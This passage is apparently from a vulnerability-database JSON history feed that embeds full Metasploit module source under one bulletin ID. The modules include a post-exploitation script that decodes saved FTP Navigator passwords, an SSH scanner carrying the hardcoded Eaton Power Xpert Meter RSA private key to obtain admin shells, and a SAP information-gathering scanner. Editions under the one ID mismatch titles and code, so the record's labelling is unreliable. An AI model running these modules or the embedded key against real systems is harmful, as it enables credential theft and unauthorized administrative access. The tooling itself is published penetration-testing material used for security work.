"THN:ED6D3F0194D2D1B96ABE1FF3AE61149F"]}, {"type": "mskb", "idList": ["KB4516046"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310883111", "OPENVAS:1361412562310852715", "OPENVAS:1361412562310876855"]}, {"type": "exploitdb", "idList": ["EDB-ID:47431", "EDB-ID:47432", "EDB-ID:47429"]}], "modified": "2019-09-28T19:07:30"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-28T19:07:30", "differentElements": ["sourceData"], "edition": 49}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-09-28T20:37:57", "history": [], "viewCount": 22, "enchantments": {"score": {"value": 2.5, "vector": "NONE", "modified": "2019-09-28T20:37:57"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:730987502722793008"]}, {"type": "cve", "idList": ["CVE-2019-11751", "CVE-2019-11736", "CVE-2019-11753"]}, {"type": "threatpost", "idList": ["THREATPOST:FF3E262419A71E9CFD99DBD361F702C3", "THREATPOST:AF55E5030AE22D58CA3861C983339196", "THREATPOST:B66E5C17C21A7D60DA65248831C7BA81", "THREATPOST:437C2783381056627B9A3AA6305FA1A2"]}, {"type": "talosblog", "idList": ["TALOSBLOG:4337E0F193BD1CA31D01BEC842EF2E1A", "TALOSBLOG:1BD08DC99655350EA575406FAF7A53E5", "TALOSBLOG:5D2BCB335060A8EBF6F71CB579112042"]}, {"type": "thn", "idList": ["THN:CC59BB94A402352488E8961780C43965", "THN:ED6D3F0194D2D1B96ABE1FF3AE61149F"]}, {"type": "mskb", "idList": ["KB4516046"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310883111", "OPENVAS:1361412562310876855", "OPENVAS:1361412562310852715"]}, {"type": "exploitdb", "idList": ["EDB-ID:47431", "EDB-ID:47429", "EDB-ID:47432"]}], "modified": "2019-09-28T20:37:57"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-09-28T20:37:57", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 50}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "d783c482642e1e45e7d119916e0a398f", "type": "metasploit", "bulletinFamily": "exploit", "title": "Eaton Xpert Meter SSH Private Key Exposure Scanner", "description": "Eaton Power Xpert Meters running firmware below version 12.x.x.x or below version 13.3.x.x ship with a public/private key pair that facilitate remote administrative access to the devices. Tested on: Firmware 12.1.9.1 and 13.3.2.10.\n", "published": "2018-08-31T22:55:20", "modified": "2018-12-12T21:47:18", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16158", "http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf", "https://www.ctrlu.net/vuln/0006.html"], "cvelist": ["CVE-2018-16158"], "lastseen": "2019-10-08T09:59:49", "history": [], "viewCount": 22, "enchantments": {"score": {"value": 5.3, "vector": "NONE", "modified": "2019-10-08T09:59:49"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-16158"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SSH/EATON_XPERT_BACKDOOR"]}], "modified": "2019-10-08T09:59:49"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/ssh/eaton_xpert_backdoor.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n###\n\n# XXX: This shouldn't be necessary but is now\nrequire 'net/ssh/command_stream'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SSH\n include Msf::Auxiliary::Scanner\n include Msf::Auxiliary::CommandShell\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Eaton Xpert Meter SSH Private Key Exposure Scanner',\n 'Description' => %q{\n Eaton Power Xpert Meters running firmware below version 12.x.x.x or\n below version 13.3.x.x ship with a public/private key pair that\n facilitate remote administrative access to the devices.\n Tested on: Firmware 12.1.9.1 and 13.3.2.10.\n },\n 'Author' => [\n 'BrianWGray'\n ],\n 'References' => [\n ['CVE', '2018-16158'],\n ['EDB', '45283'],\n ['URL', 'http://www.eaton.com/content/dam/eaton/company/news-insights/cybersecurity/security-bulletins/PXM-Advisory.pdf'],\n ['URL', 'https://www.ctrlu.net/vuln/0006.html']\n ],\n 'DisclosureDate' => 'Jul 18 2018',\n 'License' => MSF_LICENSE\n ))\n\n register_options([\n Opt::RPORT(22)\n ])\n\n register_advanced_options([\n OptBool.new('SSH_DEBUG', [false, 'SSH debugging', false]),\n OptInt.new('SSH_TIMEOUT', [false, 'SSH timeout', 10])\n ])\n end\n\n def run_host(ip)\n factory = ssh_socket_factory\n\n # Specified Kex/Encryption downgrade requirements must be set to connect to the Power Meters.\n ssh_opts = {\n auth_methods: ['publickey'],\n port: rport,\n key_data: [ key_data ],\n hmac: ['hmac-sha1'],\n encryption: ['aes128-cbc'],\n kex: ['diffie-hellman-group1-sha1'],\n host_key: ['ssh-rsa'],\n use_agent: false,\n config: false,\n proxy: factory\n }\n\n ssh_opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']\n\n begin\n ssh = Timeout.timeout(datastore['SSH_TIMEOUT']) do\n Net::SSH.start(ip, 'admin', ssh_opts)\n end\n rescue Net::SSH::Exception => e\n vprint_error(\"#{ip}:#{rport} - #{e.class}: #{e.message}\")\n return\n end\n\n return unless ssh\n\n print_good(\"#{ip}:#{rport} - Logged in as admin\")\n\n version = ssh.transport.server_version.version\n\n report_vuln(\n host: ip,\n name: self.name,\n refs: self.references,\n info: version\n )\n\n shell = Net::SSH::CommandStream.new(ssh)\n\n # XXX: Wait for CommandStream to log a channel request failure\n sleep 0.1\n\n if (e = shell.error)\n print_error(\"#{ip}:#{rport} - #{e.class}: #{e.message}\")\n return\n end\n\n info = \"#{self.name} (#{version})\"\n\n ds_merge = {\n 'USERNAME' => 'admin'\n }\n\n if datastore['CreateSession']\n start_session(self, info, ds_merge, false, shell.lsock)\n end\n\n # XXX: Ruby segfaults if we don't remove the SSH socket\n remove_socket(ssh.transport.socket)\n end\n\n def rport\n datastore['RPORT']\n end\n\n def key_data\n <<EOF\n-----BEGIN RSA PRIVATE KEY-----\nMIICWwIBAAKBgQCfwugh3Y3mLbxw0q4RZZ5rfK3Qj8t1P81E6sXjhZl7C3FyH4Mj\nC15CEzWovoQpRKrPdDaB5fVyuk6w2fKHrvHLmU2jTzq79B7A4JJEBQatAJeoVDgl\nTyfL+q6BYAtAeNsho8eP/fMwrT2vhylNJ4BTsJbmdDJMoaaHu/0IB9Z9ywIBIwKB\ngQCEX6plM+qaJeVHif3xKFAP6vZq+s0mopQjKO0bmpUczveZEsu983n8O81f7lA/\nc2j1CITvSYI6fRyhKZ0RVnCRcaQ8h/grzZNdyyD3FcqDNKO7Xf+bvYySrQXhLeQP\nI3jXGQPfBZUicGPcJclA98SBdBI1SReAUls1ZdzDwA3T8wJBAM6j1N3tYhdqal2W\ngA1/WSQrFxTt28mFeUC8enGvKLRm1Nnxk/np9qy2L58BvZzCGyHAsZyVZ7Sqtfb3\nYzqKMzUCQQDF7GrnrxNXWsIAli/UZscqIovN2ABRa2y8/JYPQAV/KRQ44vet2aaB\ntrQBK9czk0QLlBfXrKsofBW81+Swiwz/AkEAh8q/FX68zY8Ssod4uGmg+oK3ZYZd\nO0kVKop8WVXY65QIN3LdlZm/W42qQ+szdaQgdUQc8d6F+mGNhQj4EIaz7wJAYCJf\nz54t9zq2AEjyqP64gi4JY/szWr8mL+hmJKoRTGRo6G49yXhYMGAOSbY1U5CsBZ+z\nzyf7XM6ONycIrYVeFQJABB8eqx/R/6Zwi8mVKMAF8lZXZB2dB+UOU12OGgvAHCKh\n7izYQtGEgPDbklbvEZ31F7H2o337V6FkXQMFyQQdHA==\n-----END RSA PRIVATE KEY-----\nEOF\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-08T09:59:49", "differentElements": ["cvelist", "cvss", "description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 51}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-08T12:52:57", "history": [], "viewCount": 22, "enchantments": {"score": {"value": -0.5, "vector": "NONE", "modified": "2019-10-08T12:52:57"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE", "THREATPOST:3B5DE3FE8B3A0B52BD160A48693FEEDC", "THREATPOST:8B35258B1121533D53A2A119EE7F1BF8"]}, {"type": "kitploit", "idList": ["KITPLOIT:4146323370148390894", "KITPLOIT:4019975092566820832"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:4EC797D4405284D8B3BA3E2321005070", "PENTESTLAB:4D7ADE73C6CAD943F1DDC37596BA1E4B"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891948", "OPENVAS:1361412562310704542", "OPENVAS:1361412562310114138", "OPENVAS:1361412562310891947"]}, {"type": "mssecure", "idList": ["MSSECURE:23E442E0950C5F574D5B2700AD53C278"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:CB7B72151728DC6C6B664AB64551CF5C"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:156F8B3583B89837FB1E4CC569701157"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1BD08DC99655350EA575406FAF7A53E5"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154747", "PACKETSTORM:154754", "PACKETSTORM:154755"]}, {"type": "exploitdb", "idList": ["EDB-ID:47467", "EDB-ID:47468"]}], "modified": "2019-10-08T12:52:57"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-08T12:52:57", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 52}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cd80cfa74eb448cbe879112d5f040c49", "type": "metasploit", "bulletinFamily": "exploit", "title": "SAP ICF /sap/public/info Service Sensitive Information Gathering", "description": "This module uses the /sap/public/info service within SAP Internet Communication Framework (ICF) to obtain the operating system version, SAP version, IP address and other information.\n", "published": "2013-02-28T17:47:48", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-09T04:06:00", "history": [], "viewCount": 22, "enchantments": {"score": {"value": -0.9, "vector": "NONE", "modified": "2019-10-09T04:06:00"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:3DD0A4209CCE0FC066A0EB36E5146A40", "THREATPOST:D22DCF190C71B12772E59B68DFA9CCD0", "THREATPOST:F770D8B67D6B82405D9E85998887BDF3", "THREATPOST:EF56F445F97AF5EB6D4DF65B447974C0", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:36145D374BE8B413181362F0BD4A4907"]}, {"type": "thn", "idList": ["THN:8DCF845D1AC9E7107BDC3A4BCA6D2723"]}, {"type": "mskb", "idList": ["KB4516046", "KB4524153", "KB4524157"]}, {"type": "msrc", "idList": ["MSRC:E020FA1151E2B9E1C80ADE58E365DBAF"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0"]}, {"type": "kitploit", "idList": ["KITPLOIT:4146323370148390894"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0B6037A12434CEA77D029FBC99A1BF3C", "TALOSBLOG:3052A7B74E1E13F630CF51AB1B1A36D6"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:4EC797D4405284D8B3BA3E2321005070"]}, {"type": "symantec", "idList": ["SMNTC-110267", "SMNTC-110290", "SMNTC-110256"]}, {"type": "talos", "idList": ["TALOS-2019-0823"]}], "modified": "2019-10-09T04:06:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/sap/sap_icf_public_info.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\n##\n# This module is based on, inspired by, or is a port of a plugin available in\n# the Onapsis Bizploit Opensource ERP Penetration Testing framework -\n# http://www.onapsis.com/research-free-solutions.php.\n# Mariano Nunez (the author of the Bizploit framework) helped me in my efforts\n# in producing the Metasploit modules and was happy to share his knowledge and\n# experience - a very cool guy. I'd also like to thank Chris John Riley,\n# Ian de Villiers and Joris van de Vis who have Beta tested the modules and\n# provided excellent feedback. Some people just seem to enjoy hacking SAP :)\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'SAP ICF /sap/public/info Service Sensitive Information Gathering',\n 'Description' => %q{\n This module uses the /sap/public/info service within SAP Internet Communication\n Framework (ICF) to obtain the operating system version, SAP version, IP address\n and other information.\n },\n 'Author' =>\n [\n 'Agnivesh Sathasivam', # original sap_soap_rfc_system_info module\n 'nmonkee', # original sap_soap_rfc_system_info module\n 'ChrisJohnRiley' # repurposed for /sap/public/info (non-RFC)\n ],\n 'License' => MSF_LICENSE\n )\n register_options(\n [\n Opt::RPORT(8000),\n OptString.new('TARGETURI', [true, 'Path to SAP Application Server', '/'])\n ])\n end\n\n def extract_field(data, elem)\n if data =~ /<#{elem}>([^<]+)<\\/#{elem}>/i\n return $1\n end\n nil\n end\n\n def report_note_sap(type, data, value)\n # create note\n report_note(\n :host => rhost,\n :port => rport,\n :proto => 'tcp',\n :sname => 'sap',\n :type => type,\n :data => data + value\n ) if data\n # update saptbl for output\n @saptbl << [ data, value ]\n end\n\n def run_host(ip)\n\n print_status(\"[SAP] #{ip}:#{rport} - Sending request to SAP Application Server\")\n uri = normalize_uri(target_uri.path, '/sap/public/info')\n begin\n res = send_request_cgi({ 'uri' => uri })\n if res and res.code != 200\n print_error(\"[SAP] #{ip}:#{rport} - Server did not respond as expected\")\n return\n elsif not res\n print_error(\"[SAP] #{ip}:#{rport} - Server did not respond\")\n return\n end\n rescue ::Rex::ConnectionError\n print_error(\"[SAP] #{ip}:#{rport} - Unable to connect\")\n return\n end\n\n print_status(\"[SAP] #{ip}:#{rport} - Response received\")\n\n # create table for output\n @saptbl = Msf::Ui::Console::Table.new(\n Msf::Ui::Console::Table::Style::Default,\n 'Header' => \"[SAP] ICF SAP PUBLIC INFO\",\n 'Prefix' => \"\\n\",\n 'Postfix' => \"\\n\",\n 'Indent' => 1,\n 'Columns' => [ \"Key\", \"Value\" ]\n )\n\n response = res.body\n\n # extract data from response body\n rfcproto = extract_field(response, 'rfcproto')\n rfcchartyp = extract_field(response, 'rfcchartyp')\n rfcinttyp = extract_field(response, 'rfcinttyp')\n rfcflotyp = extract_field(response, 'rfcflotyp')\n rfcdest = extract_field(response, 'rfcdest')\n rfchost = extract_field(response, 'rfchost')\n rfcsysid = extract_field(response, 'rfcsysid')\n rfcdbhost = extract_field(response, 'rfcdbhost')\n rfcdbsys = extract_field(response, 'rfcdbsys')\n rfcsaprl = extract_field(response, 'rfcsaprl')\n rfcmach = extract_field(response, 'rfcmach')\n rfcopsys = extract_field(response, 'rfcopsys')\n rfctzone = extract_field(response, 'rfctzone')\n rfcdayst = extract_field(response, 'rfcdayst')\n rfcipaddr = extract_field(response, 'rfcipaddr')\n rfckernrl = extract_field(response, 'rfckernrl')\n rfcipv6addr = extract_field(response, 'rfcipv6addr')\n\n # report notes / create saptbl output\n report_note_sap('sap.version.release','Release Status of SAP System: ',rfcsaprl) if rfcsaprl\n report_note_sap('sap.version.rfc_log','RFC Log Version: ',rfcproto) if rfcproto\n report_note_sap('sap.version.kernel','Kernel Release: ',rfckernrl) if rfckernrl\n report_note_sap('system.os','Operating System: ',rfcopsys) if rfcopsys\n report_note_sap('sap.db.hostname','Database Host: ',rfcdbhost) if rfcdbhost\n report_note_sap('sap.db_system','Central Database System: ',rfcdbsys) if rfcdbsys\n report_note_sap('system.hostname','Hostname: ',rfchost) if rfchost\n report_note_sap('system.ip.v4','IPv4 Address: ',rfcipaddr) if rfcipaddr\n report_note_sap('system.ip.v6','IPv6 Address: ',rfcipv6addr) if rfcipv6addr\n report_note_sap('sap.instance','System ID: ',rfcsysid) if rfcsysid\n report_note_sap('sap.rfc.destination','RFC Destination: ',rfcdest) if rfcdest\n report_note_sap('system.timezone','Timezone (diff from UTC in seconds): ',rfctzone.gsub(/\\s+/, \"\")) if rfctzone\n report_note_sap('system.charset','Character Set: ',rfcchartyp) if rfcchartyp\n report_note_sap('sap.daylight_saving_time','Daylight Saving Time: ',rfcdayst) if rfcdayst\n report_note_sap('sap.machine_id','Machine ID: ',rfcmach.gsub(/\\s+/,\"\")) if rfcmach\n\n if rfcinttyp == 'LIT'\n report_note_sap('system.endianness','Integer Format: ', 'Little Endian')\n elsif rfcinttyp\n report_note_sap('system.endianness','Integer Format: ', 'Big Endian')\n end\n\n if rfcflotyp == 'IE3'\n report_note_sap('system.float_type','Float Type Format: ', 'IEEE')\n elsif rfcflotyp\n report_note_sap('system.float_type','Float Type Format: ', 'IBM/370')\n end\n\n # output table\n print(@saptbl.to_s)\n\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-09T04:06:00", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 53}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-09T06:01:45", "history": [], "viewCount": 23, "enchantments": {"score": {"value": -0.0, "vector": "NONE", "modified": "2019-10-09T06:01:45"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:3DD0A4209CCE0FC066A0EB36E5146A40", "THREATPOST:D22DCF190C71B12772E59B68DFA9CCD0", "THREATPOST:F770D8B67D6B82405D9E85998887BDF3", "THREATPOST:EF56F445F97AF5EB6D4DF65B447974C0", "THREATPOST:2018FCCB3FFD46BACD36ADBC6C9013CE"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:36145D374BE8B413181362F0BD4A4907"]}, {"type": "thn", "idList": ["THN:8DCF845D1AC9E7107BDC3A4BCA6D2723"]}, {"type": "mskb", "idList": ["KB4516046", "KB4524153", "KB4524157"]}, {"type": "msrc", "idList": ["MSRC:E020FA1151E2B9E1C80ADE58E365DBAF"]}, {"type": "mssecure", "idList": ["MSSECURE:C3D318931D83D536C01D2307EBC0B3B0"]}, {"type": "kitploit", "idList": ["KITPLOIT:4146323370148390894"]}, {"type": "talosblog", "idList": ["TALOSBLOG:0B6037A12434CEA77D029FBC99A1BF3C", "TALOSBLOG:3052A7B74E1E13F630CF51AB1B1A36D6"]}, {"type": "pentestlab", "idList": ["PENTESTLAB:4EC797D4405284D8B3BA3E2321005070"]}, {"type": "talos", "idList": ["TALOS-2019-0827"]}, {"type": "symantec", "idList": ["SMNTC-110304", "SMNTC-110290"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891948"]}], "modified": "2019-10-09T06:01:45"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-10-09T06:01:45", "differentElements": ["sourceData"], "edition": 54}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "66445928f8c96e92ff3800c6ff29b8ae", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-10-22T20:03:23", "history": [], "viewCount": 23, "enchantments": {"score": 